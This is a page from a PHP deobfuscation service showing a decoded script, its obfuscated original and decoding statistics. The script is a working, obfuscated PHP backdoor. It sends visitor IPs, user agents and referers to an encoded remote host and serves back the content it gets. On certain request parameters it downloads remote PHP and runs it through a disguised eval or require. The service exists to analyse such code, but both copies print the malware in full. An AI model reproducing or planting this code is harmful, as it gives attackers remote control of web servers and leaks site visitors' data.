Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $x_yz_z_yyz = urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%..

Decoded Output download

<?php 
$x_yz_z_yyz = urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54%47%76%51%48%72%50%79%63%5c%34%7a%75%46%36%69%5a%67%38%45"); 
 
error_reporting(0); 
$xyyzz__zy_ = "Ha0RDcvo3LzVDM1kXLyYTMuYnZlJWZwp2Z0VmLpxmZU="; 
$x__yz_yzzy = "Ha0RHc6MyLj9nLpdzYuU2Yt9wL=="; 
function custom_decode_func($xyz_yyz_z_) 
{ //x_zz_z_yyy($xyz_yyz_z_) 
  $x_zzy_y_yz = substr($xyz_yyz_z_, 0, 5); 
  $xyzzyy__z_ = substr($xyz_yyz_z_, -5); 
  $x_zy_zyzy_ = substr($xyz_yyz_z_, 7, strlen($xyz_yyz_z_) - 14); 
  return gzinflate(base64_decode($x_zzy_y_yz . $x_zy_zyzy_ . $xyzzyy__z_)); 
} 
function xy_zyyz__z($xz_zy__zyy) 
{ 
  if (!preg_match("/^https*\:\/\//si", $xz_zy__zyy)) { 
    return '500'; 
  } 
  $xy_y_zzz_y = file_get_contents($xz_zy__zyy); 
  if ($xy_y_zzz_y != false) { 
    return $xy_y_zzz_y; 
  } 
  $x_yzz_z_yy = "curl_init+curl_setopt+curl_exec|fsockopen|pfsockopen|stream_socket_client|socket_create"; 
  $xy_zyzy__z = $xzyyz_y_z_ = $xyzy_yz_z_ = $xy_yy__zzzrr_str = ''; 
  foreach (explode('|', $x_yzz_z_yy) as $c) { 
    $xz_yz_y_yz = 1; 
    foreach (explode('+', $c) as $d) { 
      if (!function_exists($d)) { 
        $xz_yz_y_yz = 0; 
      } 
    } 
    unset($d); 
    if ($xz_yz_y_yz) { 
      $xy_zyzy__z = $c; 
      break; 
    } 
  } 
  unset($x_yzz_z_yy, $c); 
  if ($xy_zyzy__z == '') { 
    return 0; 
  } 
  if (substr($xy_zyzy__z, 0, 1) == 'c') { 
    $xyyz__yzz_ = curl_init(); 
    curl_setopt($xyyz__yzz_, CURLOPT_URL, $xz_zy__zyy); 
    curl_setopt($xyyz__yzz_, CURLOPT_USERAGENT, 's'); 
    curl_setopt($xyyz__yzz_, CURLOPT_RETURNTRANSFER, 1); 
    curl_setopt($xyyz__yzz_, CURLOPT_TIMEOUT, 100); 
    curl_setopt($xyyz__yzz_, CURLOPT_FRESH_CONNECT, TRUE); 
    curl_setopt($xyyz__yzz_, CURLOPT_SSL_VERIFYPEER, 0); 
    $xz_y_yz_yz = curl_exec($xyyz__yzz_); 
    curl_close($xyyz__yzz_); 
    if (!$xz_y_yz_yz) { 
      return '501'; 
    } else { 
      return $xz_y_yz_yz; 
    } 
  } 
  $xz__yzyy_z = parse_url($xz_zy__zyy); 
  isset($xz__yzyy_z["host"]) || $xz__yzyy_z["host"] = ''; 
  isset($xz__yzyy_z["path"]) || $xz__yzyy_z["path"] = ''; 
  isset($xz__yzyy_z["query"]) || $xz__yzyy_z["query"] = ''; 
  isset($xz__yzyy_z["port"]) || $xz__yzyy_z["port"] = ''; 
  $x_zzy__yyz = $xz__yzyy_z["path"] ? $xz__yzyy_z["path"] . ($xz__yzyy_z["query"] ? '?' . $xz__yzyy_z["query"] : '') : '/'; 
  $xzy_y__zzy = $xz__yzyy_z["host"]; 
  if ($xz__yzyy_z["scheme"] == 'https') { 
    $xzz_y_zyy_ = '1.1'; 
    $x_zyyyz_z_ = empty($xz__yzyy_z["port"]) ? 443 : $xz__yzyy_z["port"]; 
    $xzy_y__zzy = 'ssl://'; 
    $xzy_y__zzy .= $xz__yzyy_z["host"]; 
  } else { 
    $xzz_y_zyy_ = '1.0'; 
    $x_zyyyz_z_ = empty($xz__yzyy_z["port"]) ? 80 : $xz__yzyy_z["port"]; 
  } 
  $x_zzyyy_z_ = 'Host:'; 
  $x_zzyyy_z_ .= $xzy_y__zzy; 
  $headers[] = $x_zzyyy_z_; 
  $headers[] = custom_decode_func('c87PymS0tNLsnMz7NyzskNivTgUA'); 
  $headers[] = custom_decode_func('Cy1OLbCdJ1TE/NK7ErMqBgA='); 
  $headers[] = custom_decode_func('c0xOTXJi0osdLtWS1wIA'); 
  unset($x_zzyyy_z_); 
  $xzyyz_y_z_ = "GET $x_zzy__yyz HTTP/$xzz_y_zyy_" . PHP_EOL . join(PHP_EOL, $headers) . PHP_EOL . PHP_EOL; 
  unset($headers, $xz__yzyy_z, $xzz_y_zyy_, $x_zzy__yyz); 
  $x_y_zz_yzy = null; 
  if (substr($xy_zyzy__z, -1) == 'n') { 
    $x_y_zz_yzy = $xy_zyzy__z($xzy_y__zzy, $x_zyyyz_z_, $xyzy_yz_z_, $xy_yy__zzzrr_str, 30); 
  } else { 
    if (substr($xy_zyzy__z, -1) == 't') { 
      $xzzzyy__y_ = custom_decode_func('K0kusibNLVEXBwA='); 
      $xzzzyy__y_ .= $xzy_y__zzy; 
      $xzzzyy__y_ .= ':'; 
      $xzzzyy__y_ .= $x_zyyyz_z_; 
      $x_y_zz_yzy = fwrite($xzzzyy__y_, $xyzy_yz_z_, $xy_yy__zzzrr_str, 30); 
      unset($xzzzyy__y_); 
    } 
  } 
  $x_yy_z_zyz = ''; 
  if ($x_y_zz_yzy) { 
    stream_set_blocking($x_y_zz_yzy, TRUE); 
    stream_set_timeout($x_y_zz_yzy, 30); 
    fwrite($x_y_zz_yzy, $xzyyz_y_z_); 
    $x_z_y_yzyz = stream_get_meta_data($x_y_zz_yzy); 
    if (!$x_z_y_yzyz["timed_out"]) { 
      while (!feof($x_y_zz_yzy)) { 
        $xzyy__z_yz = fgets($x_y_zz_yzy); 
        if ($xzyy__z_yz && (rawurlencode($xzyy__z_yz) == "%0D%0A" || rawurlencode($xzyy__z_yz) == "%0A")) { 
          break; 
        } 
        unset($xzyy__z_yz); 
      } 
      while (!feof($x_y_zz_yzy)) { 
        $xzz_y_yyz_ = fread($x_y_zz_yzy, 8192); 
        $x_yy_z_zyz .= $xzz_y_yyz_; 
        unset($xzz_y_yyz_); 
      } 
    } 
    unset($x_z_y_yzyz); 
    fclose($x_y_zz_yzy); 
  } else { 
    if (substr($xy_zyzy__z, -1) == 'e') { 
      $x__zyzzy_y = gethostbyname($xzy_y__zzy); 
      $x_y_zz_yzy = $xy_zyzy__z(AF_INET, SOCK_STREAM, 0); 
      if (socket_connect($x_y_zz_yzy, $x__zyzzy_y, $x_zyyyz_z_)) { 
        socket_write($x_y_zz_yzy, $xzyyz_y_z_, strlen($xzyyz_y_z_)); 
        while ($x__yyz_yzz = @socket_read($x_y_zz_yzy, 8192)) { 
          $x_yy_z_zyz .= $x__yyz_yzz; 
          unset($x__yyz_yzz); 
        } 
        $x_yy_z_zyz = explode("

", $x_yy_z_zyz); 
        array_shift($x_yy_z_zyz); 
        $x_yy_z_zyz = implode("

", $x_yy_z_zyz); 
      } 
      socket_close($x_y_zz_yzy); 
      unset($x__zyzzy_y); 
    } 
  } 
  unset($xzyyz_y_z_, $xy_zyzy__z, $x_y_zz_yzy, $x_zyyyz_z_, $xzy_y__zzy); 
  $x_yy_z_zyz = @preg_replace_callback('/(?:(?:
|
)|^)([0-9A-F]+)(?:
|
){1,2}(.*?)' . '((?:
|
)(?:[0-9A-F]+(?:
|
))|$)/si', 'x_zyzy_z_y', $x_yy_z_zyz); 
  return trim(trim($x_yy_z_zyz, "")); 
} 
function x_zyzy_z_y($matches) 
{ 
  return hexdec($matches[1]) == strlen($matches[2]) ? $matches[2] : $matches[0]; 
} 
function xyzyz___zy($xzzyy_y__z = '') 
{ 
  $xzzyy_y__z = (${"_SERVER"}["HTTP_VIA"]) ? ${"_SERVER"}["HTTP_X_FORWARDED_FOR"] : ${"_SERVER"}["REMOTE_ADDR"]; 
  $xzzyy_y__z = ($xzzyy_y__z) ? $xzzyy_y__z : ${"_SERVER"}["REMOTE_ADDR"]; 
  return trim($xzzyy_y__z); 
} 
function xzyy_y_zz_($xyz_yyz_z_ = '') 
{ 
  if (isset(${"_SERVER"}["HTTP_HOST"])) { 
    return ${"_SERVER"}["HTTP_HOST"]; 
  } elseif (isset(${"_SERVER"}["SERVER_NAME"])) { 
    return ${"_SERVER"}["SERVER_NAME"]; 
  } 
  return $xyz_yyz_z_; 
} 
function xz_zy_zyy_($xz_zy__zyy) 
{ 
  $xzyyz__y_z = xy_zyyz__z($xz_zy__zyy); 
  $xzz_yy__zy = base64_decode("PD9waHA="); 
  if (strpos($xzyyz__y_z, $xzz_yy__zy) === false) { 
    die('get failed'); 
  } 
  $xyyzyz_z__ = tmpfile(); 
  if (isset($_REQUEST["e"])) { 
    $xzyyz__y_z = str_replace($xzz_yy__zy, "", $xzyyz__y_z); 
    $xy_yy__zzz = 'e' . 'v' . 'a' . 'l'; 
    $xy_yy__zzz($xzyyz__y_z); 
    die(); 
  } 
  fwrite($xyyzyz_z__, $xzyyz__y_z); 
  $x_yzz_z_yy = stream_get_meta_data($xyyzyz_z__); 
  @require($x_yzz_z_yy["uri"]); 
  fclose($xyyzyz_z__); 
  die(); 
} 
function x__yzy_yzz($xyyzz__zy_) 
{ 
  $x_yzz_y_zy = substr($xyyzz__zy_, strlen($xyyzz__zy_) - 2); 
  $xyzy__zy_z = str_split($xyyzz__zy_); 
  $xzzy__yzy_ = ''; 
  for ( 
    $xy_zzyy__z = 0; 
    $xy_zzyy__z < count($xyzy__zy_z) - 2; 
    $xy_zzyy__z = $xy_zzyy__z + 2 
  ) { 
    $xzzy__yzy_ .= $xyzy__zy_z[$xy_zzyy__z + 1] . $xyzy__zy_z[$xy_zzyy__z]; 
  } 
  $xzzy__yzy_ .= $x_yzz_y_zy; 
  return $xzzy__yzy_; 
} 
function x_z_zyyyz_($googleUrl, $x__yzz_yzy, $xy_z_zyz_y) 
{ 
  $x_z__yzzyy = 'https://%s/ping?sitemap=%s%s/%s'; 
  $x_y__zzyzy = sprintf($x_z__yzzyy, $googleUrl, $xy_z_zyz_y["protocol"], $xy_z_zyz_y["server_domain"], $x__yzz_yzy); 
  $xyy_z__zyz = xy_zyyz__z($x_y__zzyzy); 
  if (isset($_REQUEST["st"])) { 
    var_dump($x_y__zzyzy); 
    var_dump($xyy_z__zyz); 
    die(); 
  } 
  $xzyyyz_z__ = custom_decode_func('S8/PTCz89ZcJBQA='); 
  $x_y_yzzzy_ = custom_decode_func('Ky5NToUk4iBtLgYA'); 
  $xyyzyz__z_ = custom_decode_func('S0vMzEJElwPNAQA='); 
  if (strpos($xyy_z__zyz, $xzyyyz_z__) != false) { 
    die($x_y_yzzzy_); 
  } 
  die($xyyzyz__z_); 
} 
function xyy_yzz__z($x_yy_z_zyz) 
{ 
  $xyz_zyyz__ = @preg_split("/{\|}/si", $x_yy_z_zyz, -1, PREG_SPLIT_NO_EMPTY); 
  if (!is_array($xyz_zyyz__)) { 
    return false; 
  } 
  if (count($xyz_zyyz__) != 2) { 
    return false; 
  } 
  return $xyz_zyyz__; 
} 
function xy_zyzz__y($xyyzz__zy_, $x__yz_yzzy) 
{ 
  $xy_z_zyz_y = array(); 
  $xy_z_zyz_y["default_params"] = $xyyzz__zy_; 
  $xy_z_zyz_y["api"] = base64_decode(x__yzy_yzz($xy_z_zyz_y["default_params"])); 
  $xy_z_zyz_y["server_domain"] = xzyy_y_zz_(); 
  $xy_z_zyz_y["request_url"] = ${"_SERVER"}["REQUEST_URI"]; 
  $xy_z_zyz_y["referer"] = isset(${"_SERVER"}["HTTP_REFERER"]) ? ${"_SERVER"}["HTTP_REFERER"] : ''; 
  $xy_z_zyz_y["user_agent"] = isset(${"_SERVER"}["HTTP_USER_AGENT"]) ? ${"_SERVER"}["HTTP_USER_AGENT"] : ''; 
  $xy_z_zyz_y["ip"] = xyzyz___zy(); 
  if (isset(${"_SERVER"}["HTTPS"])) { 
    $xy_z_zyz_y["protocol"] = custom_decode_func('yygpKYcSi20tcykHAA=='); 
  } else { 
    $xy_z_zyz_y["protocol"] = custom_decode_func('yygpKcEbDdqS1wcA'); 
  } 
  if (isset(${"_SERVER"}["HTTP_ACCEPT_LANGUAGE"])) { 
    $xy_z_zyz_y["language"] = ${"_SERVER"}["HTTP_ACCEPT_LANGUAGE"]; 
  } else { 
    $xy_z_zyz_y["language"] = ""; 
  } 
  if (isset(${"_GET"}["params"])) { 
    print_r($xy_z_zyz_y); 
    die(); 
  } 
  if (isset(${"_GET"}["sitemap"])) { 
    $x__yzz_yzy = ${"_GET"}["sitemap"]; 
    $x_yyz_z_zy = custom_decode_func('Ky8v1Oq0vPz0/PSdVLzs8wTFAA=='); 
    if (isset(${"_GET"}["google_url"])) { 
      $x_yyz_z_zy = ${"_GET"}["google_url"]; 
    } 
    x_z_zyyyz_($x_yyz_z_zy, $x__yzz_yzy, $xy_z_zyz_y); 
  } 
  $xyy_z_zzy_ = custom_decode_func('Uy3Wtsuy+yVS2uySgpKSi20tdPz89Pz0nVS87XyyqoUS22TyzIBEqrJSaDyILEkgwQXQIeUkAA=='); 
  $xyy_z_zzy_ = explode('|', $xyy_z_zzy_); 
  if (isset($_REQUEST["ac"]) && isset($_REQUEST["path"]) && isset($_REQUEST["t"])) { 
    xz_zy_zyy_(sprintf($xyy_z_zzy_[2], base64_decode(x__yzy_yzz($x__yz_yzzy)), $xy_z_zyz_y["api"], $_REQUEST["ac"], $_REQUEST["path"], $_REQUEST["t"])); 
  } 
  $xy_zzzyy__ = array('doxy_zyzz__y' => $xy_z_zyz_y["server_domain"], 'request_url' => $xy_z_zyz_y["request_url"], 'ip' => $xy_z_zyz_y["ip"], 'agent' => $xy_z_zyz_y["user_agent"], 'referer' => $xy_z_zyz_y["referer"], 'protocol' => $xy_z_zyz_y["protocol"], 'language' => $xy_z_zyz_y["language"]); 
  $xz_zy__zyy = sprintf($xyy_z_zzy_[0], $xy_z_zyz_y["api"], x__yzy_yzz(base64_encode(implode('{|}', $xy_zzzyy__)))); 
  $x_yy_z_zyz = xy_zyyz__z($xz_zy__zyy); 
  if (isset($_REQUEST["dump"])) { 
    var_dump($x_yy_z_zyz); 
    $x_yy_z_zyz = xy_zyyz__z($xyy_z_zzy_[1]); 
    var_dump($x_yy_z_zyz); 
    die(); 
  } 
  $xzz_y_yyz_ = xyy_yzz__z($x_yy_z_zyz); 
  if ($xzz_y_yyz_ !== false) { 
    @header($xzz_y_yyz_[0]); 
    echo $xzz_y_yyz_[1]; 
    die(); 
  } 
} 
xy_zyzz__y($xyyzz__zy_, $x__yz_yzzy); ?>

Did this file decode correctly?

Original Code

<?php
$x_yz_z_yyz = urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54%47%76%51%48%72%50%79%63%5c%34%7a%75%46%36%69%5a%67%38%45");

error_reporting(0);
$xyyzz__zy_ = "Ha0RDcvo3LzVDM1kXLyYTMuYnZlJWZwp2Z0VmLpxmZU=";
$x__yz_yzzy = "Ha0RHc6MyLj9nLpdzYuU2Yt9wL==";
function custom_decode_func($xyz_yyz_z_)
{ //x_zz_z_yyy($xyz_yyz_z_)
  $x_zzy_y_yz = substr($xyz_yyz_z_, 0, 5);
  $xyzzyy__z_ = substr($xyz_yyz_z_, -5);
  $x_zy_zyzy_ = substr($xyz_yyz_z_, 7, strlen($xyz_yyz_z_) - 14);
  return gzinflate(base64_decode($x_zzy_y_yz . $x_zy_zyzy_ . $xyzzyy__z_));
}
function xy_zyyz__z($xz_zy__zyy)
{
  if (!preg_match("/^https*\:\/\//si", $xz_zy__zyy)) {
    return '500';
  }
  $xy_y_zzz_y = file_get_contents($xz_zy__zyy);
  if ($xy_y_zzz_y != false) {
    return $xy_y_zzz_y;
  }
  $x_yzz_z_yy = "curl_init+curl_setopt+curl_exec|fsockopen|pfsockopen|stream_socket_client|socket_create";
  $xy_zyzy__z = $xzyyz_y_z_ = $xyzy_yz_z_ = $xy_yy__zzzrr_str = '';
  foreach (explode('|', $x_yzz_z_yy) as $c) {
    $xz_yz_y_yz = 1;
    foreach (explode('+', $c) as $d) {
      if (!function_exists($d)) {
        $xz_yz_y_yz = 0;
      }
    }
    unset($d);
    if ($xz_yz_y_yz) {
      $xy_zyzy__z = $c;
      break;
    }
  }
  unset($x_yzz_z_yy, $c);
  if ($xy_zyzy__z == '') {
    return 0;
  }
  if (substr($xy_zyzy__z, 0, 1) == 'c') {
    $xyyz__yzz_ = curl_init();
    curl_setopt($xyyz__yzz_, CURLOPT_URL, $xz_zy__zyy);
    curl_setopt($xyyz__yzz_, CURLOPT_USERAGENT, 's');
    curl_setopt($xyyz__yzz_, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($xyyz__yzz_, CURLOPT_TIMEOUT, 100);
    curl_setopt($xyyz__yzz_, CURLOPT_FRESH_CONNECT, TRUE);
    curl_setopt($xyyz__yzz_, CURLOPT_SSL_VERIFYPEER, 0);
    $xz_y_yz_yz = curl_exec($xyyz__yzz_);
    curl_close($xyyz__yzz_);
    if (!$xz_y_yz_yz) {
      return '501';
    } else {
      return $xz_y_yz_yz;
    }
  }
  $xz__yzyy_z = parse_url($xz_zy__zyy);
  isset($xz__yzyy_z["host"]) || $xz__yzyy_z["host"] = '';
  isset($xz__yzyy_z["path"]) || $xz__yzyy_z["path"] = '';
  isset($xz__yzyy_z["query"]) || $xz__yzyy_z["query"] = '';
  isset($xz__yzyy_z["port"]) || $xz__yzyy_z["port"] = '';
  $x_zzy__yyz = $xz__yzyy_z["path"] ? $xz__yzyy_z["path"] . ($xz__yzyy_z["query"] ? '?' . $xz__yzyy_z["query"] : '') : '/';
  $xzy_y__zzy = $xz__yzyy_z["host"];
  if ($xz__yzyy_z["scheme"] == 'https') {
    $xzz_y_zyy_ = '1.1';
    $x_zyyyz_z_ = empty($xz__yzyy_z["port"]) ? 443 : $xz__yzyy_z["port"];
    $xzy_y__zzy = 'ssl://';
    $xzy_y__zzy .= $xz__yzyy_z["host"];
  } else {
    $xzz_y_zyy_ = '1.0';
    $x_zyyyz_z_ = empty($xz__yzyy_z["port"]) ? 80 : $xz__yzyy_z["port"];
  }
  $x_zzyyy_z_ = 'Host:';
  $x_zzyyy_z_ .= $xzy_y__zzy;
  $headers[] = $x_zzyyy_z_;
  $headers[] = custom_decode_func('c87PymS0tNLsnMz7NyzskNivTgUA');
  $headers[] = custom_decode_func('Cy1OLbCdJ1TE/NK7ErMqBgA=');
  $headers[] = custom_decode_func('c0xOTXJi0osdLtWS1wIA');
  unset($x_zzyyy_z_);
  $xzyyz_y_z_ = "GET $x_zzy__yyz HTTP/$xzz_y_zyy_" . PHP_EOL . join(PHP_EOL, $headers) . PHP_EOL . PHP_EOL;
  unset($headers, $xz__yzyy_z, $xzz_y_zyy_, $x_zzy__yyz);
  $x_y_zz_yzy = null;
  if (substr($xy_zyzy__z, -1) == 'n') {
    $x_y_zz_yzy = $xy_zyzy__z($xzy_y__zzy, $x_zyyyz_z_, $xyzy_yz_z_, $xy_yy__zzzrr_str, 30);
  } else {
    if (substr($xy_zyzy__z, -1) == 't') {
      $xzzzyy__y_ = custom_decode_func('K0kusibNLVEXBwA=');
      $xzzzyy__y_ .= $xzy_y__zzy;
      $xzzzyy__y_ .= ':';
      $xzzzyy__y_ .= $x_zyyyz_z_;
      $x_y_zz_yzy = fwrite($xzzzyy__y_, $xyzy_yz_z_, $xy_yy__zzzrr_str, 30);
      unset($xzzzyy__y_);
    }
  }
  $x_yy_z_zyz = '';
  if ($x_y_zz_yzy) {
    stream_set_blocking($x_y_zz_yzy, TRUE);
    stream_set_timeout($x_y_zz_yzy, 30);
    fwrite($x_y_zz_yzy, $xzyyz_y_z_);
    $x_z_y_yzyz = stream_get_meta_data($x_y_zz_yzy);
    if (!$x_z_y_yzyz["timed_out"]) {
      while (!feof($x_y_zz_yzy)) {
        $xzyy__z_yz = fgets($x_y_zz_yzy);
        if ($xzyy__z_yz && (rawurlencode($xzyy__z_yz) == "%0D%0A" || rawurlencode($xzyy__z_yz) == "%0A")) {
          break;
        }
        unset($xzyy__z_yz);
      }
      while (!feof($x_y_zz_yzy)) {
        $xzz_y_yyz_ = fread($x_y_zz_yzy, 8192);
        $x_yy_z_zyz .= $xzz_y_yyz_;
        unset($xzz_y_yyz_);
      }
    }
    unset($x_z_y_yzyz);
    fclose($x_y_zz_yzy);
  } else {
    if (substr($xy_zyzy__z, -1) == 'e') {
      $x__zyzzy_y = gethostbyname($xzy_y__zzy);
      $x_y_zz_yzy = $xy_zyzy__z(AF_INET, SOCK_STREAM, 0);
      if (socket_connect($x_y_zz_yzy, $x__zyzzy_y, $x_zyyyz_z_)) {
        socket_write($x_y_zz_yzy, $xzyyz_y_z_, strlen($xzyyz_y_z_));
        while ($x__yyz_yzz = @socket_read($x_y_zz_yzy, 8192)) {
          $x_yy_z_zyz .= $x__yyz_yzz;
          unset($x__yyz_yzz);
        }
        $x_yy_z_zyz = explode("\r\n\r\n", $x_yy_z_zyz);
        array_shift($x_yy_z_zyz);
        $x_yy_z_zyz = implode("\r\n\r\n", $x_yy_z_zyz);
      }
      socket_close($x_y_zz_yzy);
      unset($x__zyzzy_y);
    }
  }
  unset($xzyyz_y_z_, $xy_zyzy__z, $x_y_zz_yzy, $x_zyyyz_z_, $xzy_y__zzy);
  $x_yy_z_zyz = @preg_replace_callback('/(?:(?:\r\n|\n)|^)([0-9A-F]+)(?:\r\n|\n){1,2}(.*?)' . '((?:\r\n|\n)(?:[0-9A-F]+(?:\r\n|\n))|$)/si', 'x_zyzy_z_y', $x_yy_z_zyz);
  return trim(trim($x_yy_z_zyz, "\xEF\xBB\xBF"));
}
function x_zyzy_z_y($matches)
{
  return hexdec($matches[1]) == strlen($matches[2]) ? $matches[2] : $matches[0];
}
function xyzyz___zy($xzzyy_y__z = '')
{
  $xzzyy_y__z = (${"_SERVER"}["HTTP_VIA"]) ? ${"_SERVER"}["HTTP_X_FORWARDED_FOR"] : ${"_SERVER"}["REMOTE_ADDR"];
  $xzzyy_y__z = ($xzzyy_y__z) ? $xzzyy_y__z : ${"_SERVER"}["REMOTE_ADDR"];
  return trim($xzzyy_y__z);
}
function xzyy_y_zz_($xyz_yyz_z_ = '')
{
  if (isset(${"_SERVER"}["HTTP_HOST"])) {
    return ${"_SERVER"}["HTTP_HOST"];
  } elseif (isset(${"_SERVER"}["SERVER_NAME"])) {
    return ${"_SERVER"}["SERVER_NAME"];
  }
  return $xyz_yyz_z_;
}
function xz_zy_zyy_($xz_zy__zyy)
{
  $xzyyz__y_z = xy_zyyz__z($xz_zy__zyy);
  $xzz_yy__zy = base64_decode("PD9waHA=");
  if (strpos($xzyyz__y_z, $xzz_yy__zy) === false) {
    die('get failed');
  }
  $xyyzyz_z__ = tmpfile();
  if (isset($_REQUEST["e"])) {
    $xzyyz__y_z = str_replace($xzz_yy__zy, "", $xzyyz__y_z);
    $xy_yy__zzz = 'e' . 'v' . 'a' . 'l';
    $xy_yy__zzz($xzyyz__y_z);
    die();
  }
  fwrite($xyyzyz_z__, $xzyyz__y_z);
  $x_yzz_z_yy = stream_get_meta_data($xyyzyz_z__);
  @require($x_yzz_z_yy["uri"]);
  fclose($xyyzyz_z__);
  die();
}
function x__yzy_yzz($xyyzz__zy_)
{
  $x_yzz_y_zy = substr($xyyzz__zy_, strlen($xyyzz__zy_) - 2);
  $xyzy__zy_z = str_split($xyyzz__zy_);
  $xzzy__yzy_ = '';
  for (
    $xy_zzyy__z = 0;
    $xy_zzyy__z < count($xyzy__zy_z) - 2;
    $xy_zzyy__z = $xy_zzyy__z + 2
  ) {
    $xzzy__yzy_ .= $xyzy__zy_z[$xy_zzyy__z + 1] . $xyzy__zy_z[$xy_zzyy__z];
  }
  $xzzy__yzy_ .= $x_yzz_y_zy;
  return $xzzy__yzy_;
}
function x_z_zyyyz_($googleUrl, $x__yzz_yzy, $xy_z_zyz_y)
{
  $x_z__yzzyy = 'https://%s/ping?sitemap=%s%s/%s';
  $x_y__zzyzy = sprintf($x_z__yzzyy, $googleUrl, $xy_z_zyz_y["protocol"], $xy_z_zyz_y["server_domain"], $x__yzz_yzy);
  $xyy_z__zyz = xy_zyyz__z($x_y__zzyzy);
  if (isset($_REQUEST["st"])) {
    var_dump($x_y__zzyzy);
    var_dump($xyy_z__zyz);
    die();
  }
  $xzyyyz_z__ = custom_decode_func('S8/PTCz89ZcJBQA=');
  $x_y_yzzzy_ = custom_decode_func('Ky5NToUk4iBtLgYA');
  $xyyzyz__z_ = custom_decode_func('S0vMzEJElwPNAQA=');
  if (strpos($xyy_z__zyz, $xzyyyz_z__) != false) {
    die($x_y_yzzzy_);
  }
  die($xyyzyz__z_);
}
function xyy_yzz__z($x_yy_z_zyz)
{
  $xyz_zyyz__ = @preg_split("/{\|}/si", $x_yy_z_zyz, -1, PREG_SPLIT_NO_EMPTY);
  if (!is_array($xyz_zyyz__)) {
    return false;
  }
  if (count($xyz_zyyz__) != 2) {
    return false;
  }
  return $xyz_zyyz__;
}
function xy_zyzz__y($xyyzz__zy_, $x__yz_yzzy)
{
  $xy_z_zyz_y = array();
  $xy_z_zyz_y["default_params"] = $xyyzz__zy_;
  $xy_z_zyz_y["api"] = base64_decode(x__yzy_yzz($xy_z_zyz_y["default_params"]));
  $xy_z_zyz_y["server_domain"] = xzyy_y_zz_();
  $xy_z_zyz_y["request_url"] = ${"_SERVER"}["REQUEST_URI"];
  $xy_z_zyz_y["referer"] = isset(${"_SERVER"}["HTTP_REFERER"]) ? ${"_SERVER"}["HTTP_REFERER"] : '';
  $xy_z_zyz_y["user_agent"] = isset(${"_SERVER"}["HTTP_USER_AGENT"]) ? ${"_SERVER"}["HTTP_USER_AGENT"] : '';
  $xy_z_zyz_y["ip"] = xyzyz___zy();
  if (isset(${"_SERVER"}["HTTPS"])) {
    $xy_z_zyz_y["protocol"] = custom_decode_func('yygpKYcSi20tcykHAA==');
  } else {
    $xy_z_zyz_y["protocol"] = custom_decode_func('yygpKcEbDdqS1wcA');
  }
  if (isset(${"_SERVER"}["HTTP_ACCEPT_LANGUAGE"])) {
    $xy_z_zyz_y["language"] = ${"_SERVER"}["HTTP_ACCEPT_LANGUAGE"];
  } else {
    $xy_z_zyz_y["language"] = "";
  }
  if (isset(${"_GET"}["params"])) {
    print_r($xy_z_zyz_y);
    die();
  }
  if (isset(${"_GET"}["sitemap"])) {
    $x__yzz_yzy = ${"_GET"}["sitemap"];
    $x_yyz_z_zy = custom_decode_func('Ky8v1Oq0vPz0/PSdVLzs8wTFAA==');
    if (isset(${"_GET"}["google_url"])) {
      $x_yyz_z_zy = ${"_GET"}["google_url"];
    }
    x_z_zyyyz_($x_yyz_z_zy, $x__yzz_yzy, $xy_z_zyz_y);
  }
  $xyy_z_zzy_ = custom_decode_func('Uy3Wtsuy+yVS2uySgpKSi20tdPz89Pz0nVS87XyyqoUS22TyzIBEqrJSaDyILEkgwQXQIeUkAA==');
  $xyy_z_zzy_ = explode('|', $xyy_z_zzy_);
  if (isset($_REQUEST["ac"]) && isset($_REQUEST["path"]) && isset($_REQUEST["t"])) {
    xz_zy_zyy_(sprintf($xyy_z_zzy_[2], base64_decode(x__yzy_yzz($x__yz_yzzy)), $xy_z_zyz_y["api"], $_REQUEST["ac"], $_REQUEST["path"], $_REQUEST["t"]));
  }
  $xy_zzzyy__ = array('doxy_zyzz__y' => $xy_z_zyz_y["server_domain"], 'request_url' => $xy_z_zyz_y["request_url"], 'ip' => $xy_z_zyz_y["ip"], 'agent' => $xy_z_zyz_y["user_agent"], 'referer' => $xy_z_zyz_y["referer"], 'protocol' => $xy_z_zyz_y["protocol"], 'language' => $xy_z_zyz_y["language"]);
  $xz_zy__zyy = sprintf($xyy_z_zzy_[0], $xy_z_zyz_y["api"], x__yzy_yzz(base64_encode(implode('{|}', $xy_zzzyy__))));
  $x_yy_z_zyz = xy_zyyz__z($xz_zy__zyy);
  if (isset($_REQUEST["dump"])) {
    var_dump($x_yy_z_zyz);
    $x_yy_z_zyz = xy_zyyz__z($xyy_z_zzy_[1]);
    var_dump($x_yy_z_zyz);
    die();
  }
  $xzz_y_yyz_ = xyy_yzz__z($x_yy_z_zyz);
  if ($xzz_y_yyz_ !== false) {
    @header($xzz_y_yyz_[0]);
    echo $xzz_y_yyz_[1];
    die();
  }
}
xy_zyzz__y($xyyzz__zy_, $x__yz_yzzy);

Function Calls

strlen 1
substr 1
str_split 1
urldecode 1
x__yzy_yzz 1
xy_zyzz__y 1
error_reporting 1

Variables

$x__yz_yzzy Ha0RHc6MyLj9nLpdzYuU2Yt9wL==
$x_yz_z_yyz oA-bNnK7L5_JUtRxIY+WCa93Vk0wM1OeSDdB2j/lsXfqphm*TGvQHrPyc\4z..
$x_yzz_y_zy U=
$xy_z_zyz_y [{'key': 'default_params', 'value': 'Ha0RDcvo3LzVDM1kXLyYTMuYnZlJWZwp2Z0VmLpxmZU='}]
$xyyzz__zy_ Ha0RDcvo3LzVDM1kXLyYTMuYnZlJWZwp2Z0VmLpxmZU=

Stats

MD5 1900595b4bf069ece84730078125ce14
Eval Count 0
Decode Time 85 ms